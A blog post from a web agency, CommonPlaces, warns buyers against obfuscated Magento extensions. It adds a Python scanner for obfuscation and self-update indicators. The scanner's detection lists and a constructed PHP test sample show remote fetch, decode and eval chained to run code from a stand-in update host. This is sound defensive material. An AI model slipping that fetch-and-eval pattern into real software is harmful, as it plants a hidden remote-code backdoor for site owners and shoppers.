At CommonPlaces, our primary shopping cart and e-commerce platform that we recommend and use for clients is Magento. One of the greatest things about Magento is the vast number of extensions available to users. Magento Connect offers a series of extensions from a variety of vendors that allow the user to customize and enhance their Magento Store. Here, I would like to point out a few observations that I have made from my experience using Magento. Hopefully, from this, developers and consumers in the Magento Connect marketplace can make better decisions regarding the creation and use of Magento extensions.
Recently, I have had experiences with several commercial Magento Extensions whose authors have decided that using obfuscation techniques is a reasonable way to deliver source code. For those not familiar with code obfuscation, it is the process of making the normal source code very difficult or impossible for others to read and work with. For the most part, this technique has fallen out of practice, and for very good reasons.
From the seller’s perspective, code obfuscation techniques are great for promoting repeat business. Since the code is so hard for others to interpret and work with, the buyer is very likely to return to do more business with the seller. If the buyer wants to make repairs to the code in any way, he/she may find it necessary to go back to the seller for assistance. Similarly, if the buyer wants to make any customizations to the extension’s code, he/she may also need to employ the help of the seller to accomplish it.
This practice obviously has several downsides from the buyer’s perspective.
1. You cannot customize the software
2. You cannot make repairs
3. You cannot easily determine what it does
4. You cannot ensure the security of the extension
5. You cannot reason that it is not a backdoor
6. The code could be self-updating
Even if you are not concerned about the first four above, number five should make you pause and ponder the situation. The fact that the code could be self-updating should concern you most of all. Even if you knew what the code does today, it might behave differently tomorrow or the next day, and it is nearly impossible to establish that from reading the code alone. The image below is a winning entry in a code obfuscation contest. It serves as a good example of how difficult obfuscated code can be to decipher.
During the last year, I have encountered all six of these issues at one point or another on behalf of clients seeking assistance with their existing web properties. None of the issues I have mentioned is specific to Magento extensions, but this marketplace does seem to be full of vendors who consider this a viable practice. To be clear, many vendors, perhaps the majority, deliver normal source code in their extensions. Still, encountering so many of the items above is a concerning reflection on the marketplace.
As a developer who uses Magento extensions very often, I offer a few suggestions to developers and consumers. If you are a developer of Magento extensions, I strongly urge you to avoid this approach to source code delivery. It has fallen out of practice, and it causes a great deal of frustration to consumers. As a consumer of Magento extensions, I strongly recommend thinking twice before using extensions delivered with obfuscated source code. Do some homework and evaluate the extensions before using them. Make sure the vendors with whom you are doing business provide you normal, readable source code as a requirement of the transaction.
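The "do some homework" step above can be partly automated. The following is an added example written for this post, not CommonPlaces' or any Magento vendor's code: a heuristic scanner that reads an extension's PHP files and flags the indicators behind items 3 to 6 in the list above (an encoded blob being decoded and executed, code fetched from the network and executed, the deprecated `preg_replace` `/e` modifier, high-entropy string literals, and machine-generated variable names). It assumes the extension is supplied as a mapping of relative path to PHP source text; the thresholds, rule names and the two embedded samples are constructed for the example. A match is a reason to ask the vendor for readable source before installing, not proof of malice.

```python
"""Heuristic scanner for obfuscation and self-update indicators in PHP
extension sources.  Added example; assumes files are given as
{relative_path: php_source}.  Thresholds are assumptions, not standards."""
import math
import re
import string
from collections import Counter
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    rule: str
    detail: str


# Functions commonly used to unpack a hidden payload.
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "gzdecode",
            "str_rot13", "hex2bin")
# Functions that turn a string into running code.
EXECUTORS = ("eval", "assert", "create_function")
# Functions that pull content from the network (the self-update path).
FETCHERS = ("file_get_contents", "curl_exec", "fopen", "fsockopen")

# A quoted literal of 200+ base64-alphabet characters: a likely encoded blob.
LONG_STRING_RE = re.compile(r"(['\"])([A-Za-z0-9+/=]{200,})\1")
# Variable names obfuscators tend to emit: $OO0O0, $_0x1f, $a3f9c2...
SUSPECT_IDENT_RE = re.compile(r"\$(?:[O0]{4,}|_0x[0-9a-f]+|[a-f0-9]{12,})\b")
# preg_replace with the /e modifier evaluates the replacement as PHP.
PREG_E_RE = re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]")
ENTROPY_THRESHOLD = 4.5  # bits/char; English text sits near 4, base64 near 6


def shannon_entropy(s: str) -> float:
    """Bits per character of the literal; encoded/random data scores high."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _calls(src: str, names) -> list:
    """Return which of `names` are called (name followed by '(') in src."""
    return [n for n in names if re.search(r"\b" + re.escape(n) + r"\s*\(", src)]


def scan_source(path: str, src: str) -> list:
    """Apply every rule to one file and return its findings."""
    findings = []
    decoders, executors, fetchers = _calls(src, DECODERS), _calls(src, EXECUTORS), _calls(src, FETCHERS)
    if decoders and executors:
        findings.append(Finding(path, "encoded-payload-executed", f"{executors} over {decoders}"))
    if fetchers and executors:
        findings.append(Finding(path, "remote-code-execution-path", f"{executors} with {fetchers}"))
    if PREG_E_RE.search(src):
        findings.append(Finding(path, "preg-replace-e-modifier", "replacement string is evaluated"))
    for _, literal in LONG_STRING_RE.findall(src):
        ent = shannon_entropy(literal)
        if ent > ENTROPY_THRESHOLD:
            findings.append(Finding(path, "high-entropy-blob", f"{len(literal)} chars, {ent:.2f} bits/char"))
    idents = set(SUSPECT_IDENT_RE.findall(src))
    if len(idents) >= 3:
        findings.append(Finding(path, "generated-identifiers", ", ".join(sorted(idents))))
    return findings


def scan_extension(files: dict) -> list:
    """Scan every PHP file of an extension; an empty list means no indicator fired."""
    findings = []
    for path in sorted(files):
        if path.endswith(".php"):
            findings.extend(scan_source(path, files[path]))
    return findings


# Constructed samples (not real extensions).  The blob is uniform over the
# base64 alphabet, so its entropy is exactly 6 bits/char.
BLOB = (string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/") * 4
CLEAN_SAMPLE = """<?php
class Vendor_Shipping_Model_Carrier extends Mage_Shipping_Model_Carrier_Abstract
{
    // Readable code: the buyer can audit, repair and customize it.
    public function collectRates(Mage_Shipping_Model_Rate_Request $request)
    {
        return Mage::getModel('shipping/rate_result');
    }
}
"""
OBFUSCATED_SAMPLE = f"""<?php
$OOOO0 = base64_decode('{BLOB}');
$O0O00 = file_get_contents('http://updates.example.invalid/latest.txt');
$O000O = gzinflate($OOOO0 . $O0O00);
eval($O000O);
preg_replace('/.*/e', $O000O, '');
"""

if __name__ == "__main__":
    for f in scan_extension({"Model/Carrier.php": CLEAN_SAMPLE,
                             "Helper/Data.php": OBFUSCATED_SAMPLE}):
        print(f"{f.path}: {f.rule} ({f.detail})")
```

Run against a vendor's extracted extension directory by reading each `.php` file into the mapping. A clean extension such as the first sample produces no findings; the second sample trips every rule, which is the profile of code you cannot audit and that may fetch and execute new code after you install it.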
We all shoulder responsibility in providing secure e-commerce solutions, and this approach must be part of the consideration. If you have any questions about the e-commerce solutions, please feel free to contact the CommonPlaces team.